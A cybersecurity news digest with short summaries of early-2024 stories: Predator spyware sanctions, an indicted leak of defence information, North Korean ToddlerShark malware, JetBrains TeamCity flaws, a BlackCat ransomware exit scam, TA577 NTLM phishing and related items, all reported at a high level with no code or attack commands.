Daily Brief

The U.S. Department of the Treasury's OFAC has sanctioned individuals and entities linked to the Predator commercial spyware. Predator spyware has been used to target U.S. government officials, journalists, and policy experts among others. Sanctions are imposed on the Israeli founder of Intellexa Consortium, Tal Jonathan Dilian, and Polish specialist, Sara Aleksandra Fayssal Hamou. Companies associated with the distribution of Predator technology are also targeted by the sanctions. Predator spyware's capabilities have been detailed in reports by Google's Threat Analysis Group and Cisco Talos, noting the use of zero-day vulnerabilities. Inclusion on the OFAC's SDN List freezes U.S. assets and bans transactions with the designated individuals and entities, with severe penalties for non-compliance. The U.S. move aims to counter the misuse of spyware technology and deter international partners from collaborating with sanctioned parties. Despite global concerns, Recorded Future reports that the distribution of Predator spyware is expanding to additional countries.

Retired U.S. Army Lieutenant Colonel David Franklin Slater indicted for allegedly disclosing national defense information (NDI) through a dating app. Slater, while holding a Top Secret clearance as a civilian Air Force employee, attended briefings on the war in Ukraine and passed on NDI. Information shared ranged from military targets to Russian military capabilities, classified up to the "Secret" category. Communication with the supposed Ukrainian woman, believed by Slater to be genuine, included requests for insights into U.S. intelligence assessments and Top Secret meetings. Slater faces the possibility of 10 years in prison, three years of supervised release, and a fine of $250,000 for each count if convicted. Justice Department officials emphasize the commitment to holding individuals accountable for jeopardizing national security by unlawfully disclosing classified information.

Cybercriminals exploited the open-source QEMU hypervisor platform to create stealthy network tunnels for a cyberattack on a large company. QEMU's virtual network interface and socket-type network device were used to establish a covert channel from the victim's system to the attacker's server. The tactic allowed attackers to avoid raising suspicion, bypass firewalls, intrusion detection systems, and operate with minimal impact on system performance. This approach is part of a trend where hackers utilize legitimate tools for malicious purposes to remain undetected, a method observed in 10% of Kaspersky's investigations. Tools such as Angry IP Scanner and mimikatz were also used in conjunction with QEMU to minimize the attack's footprint, including setting up a VM with only 1MB of RAM. To counter such sophisticated threats, Kaspersky recommends multi-level protection with 24/7 network and endpoint monitoring by SOC experts to detect and block early-stage attacks.

Social media platform X now exposes user IP addresses through its on-by-default audio and video calling feature, posing a significant security risk. Calls made through X are peer-to-peer, revealing IP addresses to each call participant, which could potentially lead to physical tracking. An 'Enhanced call privacy' setting can mask IP addresses by routing calls through X infrastructure, but it's unclear if the calls are encrypted. The platform's help page for the calling feature lacks information on whether any form of encryption is used to secure calls. X users are advised to disable the audio and video calling features for improved privacy and security, especially since the settings menu is considered complex to navigate. To disable the calling feature, users need to access the app settings, navigate to Privacy and Safety, then Direct Messages, and toggle off audio and video calling. Criticisms have arisen due to the feature being enabled by default, which may leave many users unaware of the potential exposure. The platform has been asked for clarification on security measures such as encryption but has not responded beyond an automated message.

North Korean threat actors have leveraged vulnerabilities in ConnectWise ScreenConnect to deploy a new malware known as TODDLERSHARK. The exploited flaws, CVE-2024-1708 and CVE-2024-1709, have enabled various cyber attacks, including the delivery of ransomware, cryptocurrency miners, and other malicious payloads. Researchers have identified similarities between TODDLERSHARK and previous malware such as BabyShark and ReconShark, linked to the Kimsuky espionage group. TODDLERSHARK uses advanced evasion techniques, including polymorphic behavior, to avoid detection, and employs a scheduled task for system persistence. South Korea's National Intelligence Service has reported incidents of North Korean hackers targeting domestic semiconductor firms, underlining the ongoing cyber threat posed by the country. The attacks, which occurred in December 2023 and February 2024, involved the extraction of sensitive data without the deployment of malware, using living-off-the-land tactics.

BlackCat ransomware gang is allegedly performing an exit scam, having taken offline their Tor data leak blog and negotiation servers. Administrators of BlackCat presented a fake FBI seizure notice to imply interference from federal law enforcement. Ransomware expert Fabian Wosar indicated that the seizure notice was implemented in a makeshift manner, signaling it as part of the scam. There have been accusations from an affiliate about the group stealing a $20 million ransom meant for them. The group, previously associated with high-profile attacks as DarkSide and BlackMatter, has fluctuated in activity following law enforcement pressure. BlackCat operators claim to be selling their malware source code for $5 million amid signs of wrapping up operations. It remains uncertain whether the group will resurface under a different name, given their tarnished reputation among potential affiliates.

Password management can significantly impact organizations, incurring costs through lost productivity, help desk support, and security risks. Employees spend an average of 11 hours per year on password-related issues, costing organizations $480.26 per employee in lost productivity. Help desk calls for password resets can comprise up to 50% of queries, with substantial expenses in support staff salaries and operational costs. Weak or reused passwords contribute to security vulnerabilities, with 86% of data breaches involving stolen credentials, and the average breach cost now at $4.45 million. Implementing multi-factor authentication (MFA) and single sign-on (SSO) solutions can enhance security while reducing help desk burden and costs. Regular employee training on password best practices and investing in password security software can prevent security incidents and operational inefficiencies. Self-service password reset options enable users to efficiently manage their passwords without help desk assistance, further reducing organizational expenses.

North Korean state-sponsored hacking group Kimsuky is exploiting vulnerabilities in ScreenConnect to install ToddlerShark malware. ToddlerShark malware is designed for long-term espionage, leveraging legitimate Microsoft binaries and altering the system registry to lower defenses. The malware establishes persistent access through scheduled tasks and continuously steals and exfiltrates data. ToddlerShark is a variant of Kimsuky's BabyShark and ReconShark backdoors previously targeting various international targets. The polymorphic nature of the malware makes it difficult to detect through static detection methods or signature-based systems. ToddlerShark's dynamic URL generation and unique payload hashes add to the difficulty of blocking the malware. Detailed analysis and indicators of compromise (IoCs) related to ToddlerShark to be shared by Kroll in an upcoming blog post.

Rapid7 reported two critical vulnerabilities in JetBrains' TeamCity CI/CD server in mid-February. JetBrains silently patched the vulnerabilities without a public advisory, contrary to infosec community norms. After Rapid7's warning, JetBrains published details of the vulnerabilities but didn't explain the silent patching. Exploits for the vulnerabilities began shortly after disclosure, amplifying concerns about the uncoordinated release. CVE-2024-27198 has a critical rating and enables an attacker to take administrative control and execute remote code. CVE-2024-27199 allows for information disclosure and system modification, including potential MITM attacks. JetBrains' cloud versions are safe; however, on-prem versions need updating to 2023.11.4 or the security patch plugin. The security community criticizes JetBrains' failure to adhere to coordinated vulnerability disclosure protocols.

Cybercriminals, identified as Savvy Seahorse, are using DNS hijacking to defraud victims through fake investment platforms. The scam entices individuals from various language groups, including Russian, Polish, and German speakers, showing a wide-reaching campaign. Social media ads and fake ChatGPT and WhatsApp bots lure victims into revealing personal information for purported high-return investments. The technical approach involves using DNS CNAME records to distribute traffic, making their phishing infrastructure elusive and resistant to takedown. Victims are tricked into entering personal details and depositing funds into fraudulent trading platforms, which are then transferred to a Russian bank. There is selective targeting as the actor excludes traffic from certain countries, such as Ukraine and India, though the rationale behind these exclusions is unclear. This method of cybercrime highlights an increasing sophistication in the ways DNS can be exploited for financial scams, marking a first in the use of CNAME records for such activity.

Exposure management in cybersecurity provides visibility into the entire attack surface and identifies points of vulnerability within an organization's infrastructure. It differs from exterior Attack Surface Management (ASM) by also considering data assets, user identities, and cloud configurations for a more comprehensive risk assessment. Organizations are shifting to cloud environments or hybrid models, expanding their attack surfaces and complicating the monitoring and securing processes. Security teams face challenges due to the dynamic threat landscape, with thousands of new vulnerabilities identified regularly, including critical ones exploited by ransomware. The reactive nature of traditional security processes and fragmented data across different tools makes it difficult to prioritize and address threats effectively. Exposure management aims to provide a prioritized, contextual view of potential breaches, helping organizations focus on mitigating the most serious risks first. Automated vulnerability management tools, like Intruder, help organizations continuously monitor changes and manage vulnerabilities efficiently.

Over 225,000 OpenAI ChatGPT login credentials have been sold on dark web markets. The credentials theft was linked to malware families LummaC2, Raccoon, and RedLine. A 36% increase in compromised ChatGPT accounts was observed from June to October 2023 compared to the first five months of the year. The surge in stolen credentials coincides with nation-state actors' interest in using AI and LLMs for cyberattacks. Cybercriminals are targeting devices with access to AI systems, using stolen data for espionage and conducting attacks. The misuse of valid account information has become a primary method for gaining initial access, complicating identity and access management for defenders. IBM X-Force warns that enterprise credentials can be stolen via credential reuse, browser credential stores, or from enterprise accounts accessed on personal devices.

TA577, a notorious threat actor, has been found utilizing ZIP archives in phishing emails to pilfer NTLM hashes. Two significant campaigns were detected on February 26 and 27, 2024, targeting hundreds of organizations with thousands of messages worldwide. The phishing strategy involves hijacking email threads and using ZIP files containing HTML files that prompt an actor-controlled SMB server connection. The HTML attachments aim to capture NTLMv2 Challenge/Response pairs to facilitate pass-the-hash attacks, allowing unauthorized network traversal and data access. TA577, also known as Water Curupira, is proficient in distributing advanced malware and has a history of rapidly adopting new cyberattack techniques. Proofpoint highlights TA577's agility in adapting to the cybersecurity landscape, continuously evolving methods to evade detection. To mitigate risks, organizations are advised to block outbound SMB connections to curb potential exploit avenues.

Penny Appeal, a charity aiding crisis-hit countries, ordered by ICO to stop sending unsolicited texts. Charity found to have sent over 460,000 spam texts in ten days, violating recipients' consent. ICO received 354 complaints, with recipients reporting ignored opt-out requests and intrusive messaging. Penny Appeal's failure to heed prior warnings resulted in an ICO investigation exposing a flawed database practice. The charity failed to log opt-out requests, messaging individuals who had interacted within the past five years. ICO stresses the importance of valid consent for marketing communications, regardless of the organization's size. This is not the first incidence of a charity facing ICO's scrutiny; even larger charities have been previously fined. The ICO's action highlights the ongoing responsibility for all entities, including non-profits, to comply with direct marketing laws.

Newly disclosed security vulnerabilities in JetBrains TeamCity could allow attackers to take over servers. The identified flaws, CVE-2024-27198 and CVE-2024-27199, have been fixed in the latest TeamCity version. Attackers exploiting these vulnerabilities could bypass authentication and potentially compromise a server, facilitating supply chain attacks. Rapid7, a cybersecurity firm, discovered and reported the flaws which include an authentication bypass and path traversal issue. The TeamCity Cloud instances have already been addressed, but on-premises versions require immediate updates. Prior vulnerabilities in TeamCity have seen exploitation by threat actors from North Korea and Russia, highlighting the risks of delay in patching. JetBrains urges users to update their TeamCity servers to mitigate the risk of exploitation.